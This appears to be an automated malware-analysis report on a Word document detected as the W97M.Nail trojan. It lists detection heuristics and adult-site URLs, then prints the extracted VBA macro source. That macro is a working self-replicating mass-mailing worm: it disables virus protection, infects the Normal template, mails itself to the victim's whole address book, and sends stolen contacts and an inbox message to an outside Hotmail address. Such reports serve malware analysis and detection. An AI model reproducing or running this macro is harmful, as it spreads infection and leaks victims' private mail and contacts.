Verdict: MALICIOUS
Risk Score: 202
Heuristics: 6
- ClamAV: Doc.Trojan.Nail-3 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Nail-3
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted URLs (each labelled "In document text (OLE body)"):

- http://www.cyberclub.com/ignite/members
- http://hotbox.danni.com/hotbox/
- http://www.powerflow.com/members/135798642.html
- http://www.allasians1.com/membersonly/gallery/
- http://www.breathlessbabes.com/protected
- http://www.caughtceleb.com/cmlogin.html
- http://www.pornmountain.com/members
- http://www.sexillustrated.com/1stquarter/members2.htm
- http://www.redlight.com/members
- http://www.freeamsterdamsex.com/members
- http://www.sourceofkaos.com/homes/1nternal
- http://www.itouchmyself.com/members/index.html
- http://www.dixiecam.com/members/
- http://www.itsreal.com/members
- http://www.111sexstreet.com/private/sex02.html
- http://teenlabs.com/reactor/reactor1.htm
- http://www.sweet18.com/home.html
- http://members.campusbabes.com/
- http://www.sextv.com/members/index.html
- http://www.smutheaven.com/m/members.html
- http://www.creamythighs.com/members/
- http://www.celebrity-hardcore.com/members/index.html
- http://www.dirtyonline.com/membersonly/
- http://www.sexpaige.com/members/mem_home.html
- http://members.sexy-photos.com
- http://www.cybersex.com/members/index.html
- http://members2.5starerotica.com/index.html
- http://www.virtualhardcore.com/pictures/index.html
- http://www.sexxx-drive.com/members/index.html
- http://www.sizzle.com/members/index.shtml
- http://www.lesbiansonly.com/members.htm
- http://members.maturewomen.com/
- http://www.sexualeuphoria.com/members/archives/index.html
- http://www.pureteens.com/members
- http://www.extremeadultsex.com/members
- http://www.sexroom.net/members/
- http://amazingonline.com/membersdox/
- http://www.venusonline.com/tricia/Members/index.htm
- http://www.chickflicks.com/m/members.html
- http://www.valuesex.com/valuesexmembers/main.html
- http://www.xxxensation.com/cgi-sec/xxxlogin
- http://www.kingporno.com/authorized/
- http://www.erotic-express.com/member/eng/
- http://www.sexualeuphoria.com/members/index.html
- http://members.celebs-n-models.net/babes/
- http://www.erosnet.com/home.html
- http://www.manhole.com/members/index.html
- http://www.cyberstrip.com/members/html/members.cfm
- http://www.corinadine.com/members/index.html
- http://www.Shockingpink.com/members/tina1.html
- +21 more URL(s)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9155 bytes | a07a65c7df1c496800cd020db2979b263d0bfade69c2bc43aa330bad0e473045 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<!--1nternal-->
'W97M.Nail/ACM (20/03/99) Variant v0.2
Private Sub Document_Open()
On Error Resume Next
Randomize
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Options.VirusProtection = False
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office", "Melissa?") <> "" Then
MsgBox ("W97M.Nail variant detected...")
GInfo = "ES: "
End If
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
Set MAPISess = CreateObject("MAPI.Session")
MAPISess.Logon
SubjectLines = Array("", MAPISess.CurrentUser, "Who's your Daddy?", "I've finished it!")
ContentLines = Array("", "I thought you should know about this recent development...", "The media distort everything...", "You would probably find this interesting...")
MesNum = Int(Rnd * 4)
CRLF = Chr(13) + Chr(10)
MesContent = CRLF + ContentLines(MesNum) + CRLF + CRLF + MAPISess.CurrentUser
Set ChainMes = MAPISess.Outbox.Messages.Add(SubjectLines(MesNum), MesContent)
Set objRecipients = ChainMes.Recipients
For Each AdrEntry In MAPISess.AddressLists(1).AddressEntries
Set Recp = objRecipients.Add(Name:=AdrEntry.Address, Type:=3)
GInfo = GInfo + AdrEntry.Address + ";"
Next
Set objAttach = ChainMes.Attachments.Add
objAttach.Type = 1
objAttach.Source = ActiveDocument.FullName
objAttach.Position = 0
objAttach.Name = MAPISess.CurrentUser
GInfo = GInfo + CRLF + CRLF + MAPISess.Inbox.Messages(Int(Rnd * MAPISess.Inbox.Messages.Count) + 1).Text + CRLF
GInfo = GInfo + "W97M.Nail II"
Set Retr = MAPISess.Outbox.Messages.Add(MAPISess.CurrentUser, GInfo)
Set Recp = Retr.Recipients.Add(Name:="chainnail@hotmail.com")
Retr.Send
ChainMes.Send
MAPISess.Logoff
End If
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
End Sub
Private Sub Document_New()
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/92b0d3c206ad4a8b8fb99283bf4624ed.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4714 bytes
' Line #0:
' QuoteRem 0x0000 0x000F "<!--1nternal-->"
' Line #1:
' QuoteRem 0x0000 0x0025 "W97M.Nail/ACM (20/03/99) Variant v0.2"
' Line #2:
' FuncDefn (Private Sub Document_Open())
' Line #3:
' OnError (Resume Next)
' Line #4:
' ArgsCall Read 0x0000
' Line #5:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #6:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #7:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #8:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set NT
' Line #9:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set AD
' Line #10:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld NT
'
... (truncated)
```